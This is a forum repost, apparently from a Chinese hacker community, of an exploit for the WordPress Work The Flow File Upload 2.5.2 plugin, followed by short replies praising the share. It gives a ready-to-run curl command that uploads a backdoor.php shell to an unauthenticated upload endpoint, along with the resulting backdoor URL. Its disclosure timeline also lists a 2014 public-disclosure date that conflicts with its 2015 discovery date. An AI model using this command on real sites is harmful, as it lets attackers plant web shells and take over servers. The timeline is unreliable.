Wordpress Work-The-Flow 2.5.2上传shell
描述:WordPress Work The Flow plugin version 2.5.2 suffers from a remote shell upload vulnerability.
######################
# Exploit Title : Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Software Link : https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip
# Date : 2015-03-14
# Tested on : Linux BackBox 4.0 / curl 7.35.0
######################
# Description:
Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts.
Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving.
This two in one plugin provides shortcodes to embed front end user file upload capability and / or step by step workflow.
######################
# Location :
http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php
######################
# PoC:
curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php
# Backdoor Location:
http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php
######################
# Vulnerability Disclosure Timeline:
2015-03-14: Discovered vulnerability
2015-04-03: Vendor Notification
2015-04-03: Vendor Response/Feedback
2015-04-04: Vendor Fix/Patch (2.5.3)
2014-04-04: Public Disclosure
# 现在我有4.1.1版本的wordpress,具体不清楚有没有任意上传。 支持,看起来不错呢! 感谢楼主的分享~ 支持中国红客联盟(ihonker.org) 支持,看起来不错呢! 支持,看起来不错呢! 支持,看起来不错呢!
页:
[1]